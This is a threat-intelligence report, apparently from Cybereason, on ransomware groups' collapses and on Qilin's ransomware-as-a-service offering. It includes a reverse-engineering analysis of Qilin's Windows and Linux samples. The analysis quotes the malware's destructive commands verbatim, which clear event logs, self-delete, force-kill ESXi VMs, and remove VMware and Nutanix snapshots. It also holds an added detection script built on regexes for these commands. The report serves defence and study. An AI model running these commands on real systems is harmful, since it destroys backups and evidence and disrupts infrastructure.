The ransomware landscape is undergoing a turbulent realignment, marked by collapses, takeovers, and unexpected internal betrayals.
Once-dominant groups such as RansomHub, LockBit, Everest, and BlackLock have recently suffered abrupt shutdowns, operational failures, and defacements of their dark web infrastructure, revealing deep instability in the cybercriminal ecosystem.
One of the most significant shifts occurred in late March 2025, when RansomHub, widely considered the most active ransomware group of 2024, disappeared without explanation. The group had risen rapidly by operating a polished Ransomware-as-a-Service (RaaS) model, offering affiliates advanced payloads, reliable payouts, and transparent operations. Its malware supported cross-platform deployment across Windows, Linux, and ESXi systems. But just as RansomHub was consolidating its dominance, its leak site vanished.
Days later, rival group DragonForce publicly claimed it had absorbed RansomHub’s infrastructure and affiliates, even integrating the RansomHub logo into its own branding. Whether this was a hostile takeover, a voluntary merger, or simply opportunistic branding remains unclear—but RansomHub ceased all activity, leaving victims mid-negotiation and sowing confusion.
RansomHub DLS is offline
In parallel, other ransomware leak sites suffered unexpected disruptions. Both LockBit and Everest were targeted by anonymous actors signing "XOXO from Prague". On May 8th, LockBit’s leak site was defaced and replaced with a taunting message:
"Don’t do crime. CRIME IS BAD. xoxo from Prague."
Everest Ransomware DLS
The attacker leaked a full database dump containing chat transcripts and operational data, which was later confirmed by researchers as authentic, severely damaging LockBit’s internal security reputation.
In the case of Everest, however, the incident was limited to a defacement only. Its Tor-based leak site was similarly replaced with the same mocking message, but no internal data was leaked, and the site went offline shortly after. While the identity of the group behind the attacks remains unknown, the incidents suggest that ransomware groups themselves are now becoming targets, whether of vigilantes, rivals, or external pressure campaigns.
Another particularly notable case is BlackLock, a mid-sized ransomware operation believed to be a rebrand of the former Eldorado group. In March 2025, BlackLock was breached by researchers from Resecurity who exploited an LFI vulnerability in its leak site. They quietly extracted internal data and warned some victims in advance of potential data publication.
Days later, DragonForce publicly defaced the BlackLock site and leaked configuration files, internal chats, and builder artifacts, claiming responsibility for the breach. However, evidence suggests the action may have been coordinated, as BlackLock’s codebase and DragonForce’s appeared to be nearly identical, and BlackLock’s admin showed no resistance. This points to either a soft handover or strategic absorption under DragonForce’s expanding umbrella.
Amid these disruptions, a new contender is rising: Qilin. With a growing presence across forums and ransomware activity trackers, Qilin operates a technically mature infrastructure: payloads built in Rust and C, loaders with advanced evasion features, and an affiliate panel offering Safe Mode execution, network spreading, log cleanup, and automated negotiation tools. Beyond the malware itself, Qilin offers spam services, PB-scale data storage, legal guidance, and a full set of operational features—positioning itself not just as a ransomware group, but as a full-service cybercrime platform.
As older operations collapse under pressure, betrayal, or reorganization, Qilin is stepping in, not only to fill the void, but to redefine the ransomware-as-a-service model for the next generation of affiliates.
Qilin is a ransomware-as-a-service (RaaS) group that has been active since October 2022, steadily building its reputation through a series of high-impact cyberattacks across various industries. The group operates by providing its ransomware tools and infrastructure to affiliates, taking a 15–20% share of the ransom payments.
Qilin has grown increasingly active over the past year, with more than 50 attacks claimed in recent months and over 100 organizations listed on its dark web leak site. Once they gain access to a network, they steal sensitive data, disrupt systems, and publish stolen information if victims refuse to pay. Ransom demands usually range from $50,000 to $800,000, making it a flexible and financially motivated threat actor.
In February 2024, reports emerged that Qilin was operating a website called “WikiLeaks V2,” where it published data stolen from compromised companies.
The last recorded activity on the website was in April 2025. As of May 2025, the website, which is hosted by OPTIMA LLC.
Qilin wikileaks v2 project old server information (Shodan)
On a Russian darknet forum, Qilin ransomware is promoted as a sophisticated Ransomware-as-a-Service (RaaS) solution, offering a comprehensive set of features designed for versatility and effectiveness. It is marketed as a highly configurable tool capable of adapting to diverse attack scenarios, attracting affiliates with its robust technical capabilities and additional strategic functionalities.
The ransomware employs robust encryption algorithms, including ChaCha20, AES, and RSA-4096, to securely encrypt target data. Operators can tweak it with four modes: normal, step-skip, fast, and percent, letting them prioritize speed or thoroughness.
A notable feature is the “Call Lawyer” function, which provides legal consultation to increase pressure during ransom negotiations. Additionally, with network propagation capabilities and a DDoS option introduced in April 2025, Qilin enhances its adaptability for various attack scenarios.
Key Options:
Below is detailed information on how the Qilin ransomware is offered as a Ransomware-as-a-Service (RaaS) and its key features.
Translation:
Briefly about the available functionality:
Panel:
The software is a unique project, not just another fork of open-source payloads.
The build is written in pure Rust, which gives it speed and security advantages.
For LINUX/ESXI systems, it’s written in pure C.
Qilin explicitly instructs its affiliates not to target systems located in CIS countries.
The DDOS option was added to the panel in April 2025.
Other notable options:
Qilin has introduced several new features in its latest version:
Translation:
“A new feature has been added to our panel: legal assistance.
If you need legal consultation regarding your target, simply click the “Call lawyer” button located within the target interface, and our legal team will contact you privately to provide qualified legal support.
The mere appearance of a lawyer in the chat can exert indirect pressure on the company and increase the ransom amount, as companies want to avoid legal proceedings. The benefits of working with the legal department include:
The heatmap below, which illustrates reported host compromises, indicates that Qilin is intensifying its activity and emerging as a growing threat.
Overview
Our team reverse-engineered two samples of the Qilin ransomware: a Rust-based variant targeting Windows and a C-based variant designed for Linux hosts, particularly those running ESXi and other virtualization or server environments. Our goal is to dissect their functionality, uncover their targeting mechanisms, and highlight key differences in their implementation.
By examining these samples, we aim to provide insights into Qilin’s cross-platform strategies and enhance defenses against this evolving threat.
Windows sample hash: 31c3574456573c89d444478772597db40f075e25c67b8de39926d2faa63ca1d8
“Detect it Easy” analysis information
Qilin Loader Operation
Qilin ransomware operates by executing a series of malicious actions on infected systems, all driven by specific command-line parameters, and a password is required to run the sample. Once executed, it uses tools like PsExec to spread across the network, targeting other domain computers for further infection. The ransomware also deletes shadow copies and clears Windows event logs to cover its tracks, making detection harder for system administrators.
In addition, it runs a PowerShell command to identify and print ransom notes via any discovered printers, further escalating the attack's impact. The ransomware changes the victim’s desktop wallpaper to deliver its ransom message visually and goes to the extent of dismounting disk images to prevent access to important files.
Additionally, it installs the Active Directory PowerShell (AD PS) module to exploit domain-level privileges, enhancing its ability to control the environment. In the final phase, Qilin deletes its own traces by self-deleting after executing all its malicious actions.
Qilin runs a PowerShell command to identify and print ransom notes via any discovered printers:
powershell -Command Get-Printer | Format-List Name, Driver,shared
Below is a list of commands the ransomware executes on Windows systems:
Events log clear
$logs = Get-WinEvent -ListLog * | Where-Object {$_.RecordCount} | Select-Object -ExpandProperty LogName ; ForEach ( $l in $logs | Sort | Get-Unique ) {[System.Diagnostics.Eventing.Reader.EventLogSession]::GlobalSession.ClearLog($l)}
Set machine lockscreen image
REG ADD /v LockScreenImagePath /t REG_SZ /d '' /f ; REG ADD /v LockScreenImageUrl /t REG_SZ /d '' /f ; REG ADD /v LockScreenImageStatus /t REG_DWORD /d 1 /f
Installing AD PS module to exploit domain-level privileges, enhancing its ability to control the environment
powershell -Command "ServerManagerCmd.exe -i RSAT-AD-PowerShell; Install-WindowsFeature RSAT-AD-PowerShell; Add-WindowsCapability -Online -Name 'RSAT.ActiveDirectory.DS-LDS.Tools~~~~0.0.1.0'"
Self delete command line parameters
/C timeout /T 10 & Del
Checking disk image
Get-DiskImage -ImagePath '' | Select-Object -ExpandProperty Attached
Dismounting disk image
Dismount-DiskImage -ImagePath
Enumerating all domain hosts
-Command "Import-Module ActiveDirectory ; Get-ADComputer -Filter * | Select-Object -ExpandProperty DNSHostName"
-Command "Import-Module ActiveDirectory ; Get-ADComputer -Filter * | Where-Object { Test-Connection -ComputerName $_.DNSHostName -Count 1 -Quiet } | ForEach-Object { $_.DNSHostName }"
Enable Safe Mode with Networking if safe mode parameter was set
BCDEdit.exe /set {current} safeboot network
Additionally, the ransomware includes a hardcoded (default) blacklist of file extensions that it does not encrypt:
"File_pattern_black_list": "themepack","nls","diapkg", "msi","lnk","exe","scr","bat","drv","rtp","msp","prf","msc","ico","key","ocx","diagcab","diagcfg","pdb","wpx","hlp","icns","rom","dll","msstyles","mod","ps1","ics","hta","bin","cmd","ani","386","lock","cur","idx","sys","com","deskthemepack","shs","theme","mpa","nomedia","spl","cpl","adv","icl","msu"
QILIN Malicious PowerShell Script
The malware includes a specialized PowerShell script that targets VMware vCenter and ESXi hosts.
Key Capabilities of the Script:
The Qilin Windows variant, written in Rust, is a sophisticated ransomware that requires a password to initiate its malicious operations, leveraging command-line parameters to execute a range of destructive actions. It spreads across networks using tools like PsExec, exhibiting worm-like capabilities, while deleting shadow copies and clearing Windows event logs to evade detection. Additionally, it targets VMware environments by enumerating vCenter and ESXi hosts, modifying root passwords, enabling SSH, and deploying payloads across hypervisors, enhancing its reach and impact.
Qilin Ransomware (Linux, C Variant)
In 2022 and 2023, multiple vendors reported that the Qilin ransomware began targeting not only Windows but also Linux hosts. To gain a deeper understanding of its behavior and specific targets, we conducted an in-depth analysis of the Linux variant.
Linux sample hash:
The analyzed Qilin sample is written in C. This Linux variant uses no packing or obfuscation, so its malicious intent can be exposed simply by running the strings command.
The ransomware sample has an embedded usage help message, possibly for debugging.
The options available are as follows:
The ransomware requires a password as an argument (--password) before proceeding with data encryption. This is a common technique used to evade dynamic analysis tools, such as sandboxes.
Once the password check succeeds, the ransomware performs analysis of the system it's running on.
The malware calls uname and checks if the malware is running on:
Depending on the detection of ESXi host or Nutanix host, it will perform different actions.
ESXi vSphere
For VMware ESXi hosts it will execute the following commands:
for I in $(esxcli storage filesystem list | grep 'VMFS-5' | awk '{print $1}'); do
vmkfstools -c 10M -d eagerzeroedthick $I/eztDisk; vmkfstools -U $I/eztDisk;
done
for I in $(esxcli storage filesystem list | grep 'VMFS-6' | awk '{print $1}'); do
vmkfstools -c 10M -d eagerzeroedthick $I/eztDisk > /dev/null; vmkfstools -U $I/eztDisk > /dev/null;
done
The commands above apply a workaround for a known problem on vSphere 7.0 ESXi hosts that leads to memory exhaustion, ensuring system stability during encryption; the two loops cover both VMFS-5 and VMFS-6 datastores, so older vSphere installations are included.
Finally, the malware optimizes I/O performance during encryption by increasing the buffer-cache size and reducing the flush interval with the following commands:
esxcfg-advcfg -s 32768 /BufferCache/MaxCapacity
esxcfg-advcfg -s 20000 /BufferCache/FlushInterval
The enumeration and termination of VM processes on an ESXi host:
esxcli vm process list
esxcli vm process kill -t force -w [ID]
Listing all the registered VMs and removing the snapshots are performed with following method:
vim-cmd vmsvc/getallvms
vim-cmd vmsvc/snapshot.removeall [ID] > /dev/null 2>&1
Nutanix CVM
If it detects a Nutanix host, it performs the following actions using the Acropolis CLI interface.
Disable High-Availability (HA) restarts by setting its priority to 0. Disabling HA tells the system not to automatically turn those virtual machines back on if the physical host fails.
for vm_id in `acli vm.list | grep -oP '([a-f0-9]{8}-[a-f0-9]{4}-[a-f0-9]{4}-[a-f0-9]{4}-[a-f0-9]{12})' | awk '{print $1}'`; do acli vm.update $vm_id ha_priority=0; done
Force power-off all VMs:
for vm_id in `acli vm.list | grep -oP '([a-f0-9]{8}-[a-f0-9]{4}-[a-f0-9]{4}-[a-f0-9]{4}-[a-f0-9]{12})' | awk '{print $1}'`; do acli vm.force_off $vm_id; done
Silent removal of all the snapshots:
for snap_id in `acli snapshot.list | grep -oP '([a-f0-9]{8}-[a-f0-9]{4}-[a-f0-9]{4}-[a-f0-9]{4}-[a-f0-9]{12})' | awk '{print $1}'`; do echo "yes" | acli snapshot.delete $snap_id; done
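As an added example that is not part of the original analysis or Cybereason's tooling, the following Python script turns the Windows command lines listed earlier and the ESXi/Nutanix command sequences in this section into simple detection rules and runs them over constructed sample log lines. The regexes, the sample events and the "two distinct behaviours" triage threshold are assumptions written against the commands quoted on the page; the ATT&CK IDs are the ones from the page's technique table.

```python
import re

# Added example (not Cybereason's tooling): hand-written regexes for the Windows, ESXi and
# Nutanix commands quoted in the analysis. ATT&CK IDs come from the page's table where one applies.
SIGNATURES = [
    ("clear_event_logs", "T1070.001",
     re.compile(r"Get-WinEvent\s+-ListLog\s+\*.*ClearLog", re.I)),
    ("self_delete_after_timeout", "T1070.004",
     re.compile(r"/C\s+timeout\s+/T\s+\d+\s*&\s*Del\b", re.I)),
    ("ad_computer_enumeration", "T1087",
     re.compile(r"Get-ADComputer\s+-Filter\s+\*", re.I)),
    ("safe_mode_with_networking", "",
     re.compile(r"bcdedit(\.exe)?\s+/set\s+\{current\}\s+safeboot\s+network", re.I)),
    ("esxi_force_kill_vm", "T1675",
     re.compile(r"esxcli\s+vm\s+process\s+kill\s+-t\s+force")),
    ("esxi_remove_all_snapshots", "T1490",
     re.compile(r"vim-cmd\s+vmsvc/snapshot\.removeall")),
    ("nutanix_disable_ha", "",
     re.compile(r"acli\s+vm\.update\s+\S+\s+ha_priority=0")),
    ("nutanix_delete_snapshot", "T1490",
     re.compile(r"acli\s+snapshot\.delete\s+\S+")),
]

def scan(lines):
    """Return one (behaviour, attack_id, line) tuple per matching log line."""
    hits = []
    for line in lines:
        for name, attack_id, pattern in SIGNATURES:
            if pattern.search(line):
                hits.append((name, attack_id, line.strip()))
                break  # first matching signature wins for this line
    return hits

def triage(lines, min_distinct=2):
    """Flag a host only when several distinct behaviours co-occur: one such command can be admin work."""
    return len({name for name, _, _ in scan(lines)}) >= min_distinct

# Constructed sample events (not real telemetry). The first line of each set is benign.
WINDOWS_EVENTS = [
    'CommandLine: powershell.exe -Command "Get-Process | Sort-Object CPU"',
    'CommandLine: powershell.exe -Command "$logs = Get-WinEvent -ListLog * | Select-Object'
    ' -ExpandProperty LogName ; ForEach ($l in $logs) {[System.Diagnostics.Eventing.Reader.EventLogSession]::GlobalSession.ClearLog($l)}"',
    'CommandLine: powershell.exe -Command "Import-Module ActiveDirectory ; Get-ADComputer -Filter *'
    ' | Select-Object -ExpandProperty DNSHostName"',
    'CommandLine: BCDEdit.exe /set {current} safeboot network',
    'CommandLine: cmd.exe /C timeout /T 10 & Del C:\\Users\\Public\\sample.exe',
]
HYPERVISOR_EVENTS = [  # ESXi shell.log style lines, then Nutanix CVM command history
    '2025-05-02T10:00:01Z shell[2001]: [root]: esxcli network ip interface list',
    '2025-05-02T10:00:07Z shell[2001]: [root]: esxcli vm process kill -t force -w 2099251',
    '2025-05-02T10:00:09Z shell[2001]: [root]: vim-cmd vmsvc/snapshot.removeall 12 > /dev/null 2>&1',
    'acli vm.update 3f1c2a9e-7b4d-4a1c-9e2f-0a1b2c3d4e5f ha_priority=0',
    'echo "yes" | acli snapshot.delete 0a9b8c7d-6e5f-4a3b-8c2d-1e0f9a8b7c6d',
]
```

Running `scan()` over a real Sysmon process-creation feed or an ESXi shell.log export works the same way; the benign lines in each set show why `triage()` counts distinct behaviours instead of alerting on a single command.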
Targeted Data
Although this Linux-based sample is clearly aimed at enterprise applications - virtualization platforms like VMware ESXi (and Nutanix), VirtualBox, Xen, and KVM, it still embeds a comprehensive hard-coded list of user-space file extensions and data paths.
Specifically, it encrypts:
1. Virtualization solution folders:
2. Database files:
3. Containers:
Once the malware encrypts all target files, it creates a ransom note file suffixed _RECOVER.txt that contains detailed payment instructions and steps for file recovery.
In addition to dropping a ransom note on disk, the malware also injects its demand into the system’s /etc/motd (Message of the Day), ensuring that every user who logs in via shell is immediately presented with the ransom instructions upon authentication:
By combining hypervisor directory encryption (with explicit checks for ESXi and Nutanix) and a broad sweep of database and container data, the malware ensures maximum disruption across both virtualized infrastructures and traditional Linux workloads.
IP Address
185[.]208.156[.]157 - FTP data share
185[.]196.10[.]19 - FTP data share
80[.]64.16[.]87 - WikiLeaks V2
SHA-256
Windows version:
31c3574456573c89d444478772597db40f075e25c67b8de39926d2faa63ca1d8
C9707a3bc0f177e1d1a5587c61699975b1153406962d187c9a732f97d8f867c5
Linux version:
13cda19a9bf493f168d0eb6e8b2300828017b0ef437f75548a6c50bfb4a42a09
a7f2a21c0cd5681eab30265432367cf4b649d2b340963a977e70a16738e955ac
Tactic | ATT&CK Technique (ID)
--- | ---
TA0002: Execution | T1569.002 – System Services: Service Execution
TA0005: Defense Evasion | T1070.004 – Indicator Removal: File Deletion
TA0005: Defense Evasion | T1070.001 – Indicator Removal: Clear Windows Event Logs
TA0005: Defense Evasion | T1218 – System Binary Proxy Execution
TA0007: Discovery | T1087 – Account Discovery
TA0007: Discovery | T1120 – Peripheral Device Discovery
TA0008: Lateral Movement | T1675 – ESXi Administration Command
TA0040: Impact | T1486 – Data Encrypted for Impact
TA0040: Impact | T1490 – Inhibit System Recovery
Mark Tsipershtein, Security Researcher
Mark Tsipershtein, a security researcher at the Cybereason Security Research Team, focuses on research, analysis automation and infrastructure. Mark has more than 20 years of experience in SQA, automation, and security research.
Evgeny Ananin, Threat Intelligence Analyst
Evgeny is a Threat Intelligence Analyst on the Cybereason Threat Intelligence Team, leveraging Red Teaming expertise and OSINT to investigate adversarial infrastructure and Darknet activities. He previously contributed to advanced malware research and penetration testing.